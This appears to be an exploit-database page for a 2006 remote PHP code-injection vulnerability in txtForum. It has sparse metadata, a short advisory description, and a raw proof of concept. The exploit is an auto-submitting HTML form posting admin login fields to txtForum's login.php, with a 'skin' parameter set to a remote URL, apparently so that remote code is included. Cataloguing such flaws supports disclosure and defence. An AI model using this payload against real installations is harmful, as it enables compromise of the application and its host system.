header-logo
Suggest Exploit
vendor:
txtForum
by:
SecurityFocus
8.8
CVSS
HIGH
Remote PHP Code-Injection
94
CWE
Product Name: txtForum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

txtForum Remote PHP Code-Injection Vulnerability

txtForum is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.

Mitigation:

N/A
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17061/info

txtForum is prone to a remote PHP code-injection vulnerability. 

An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.

<form action='http://www.example.com/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://www.example.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
cqrsecured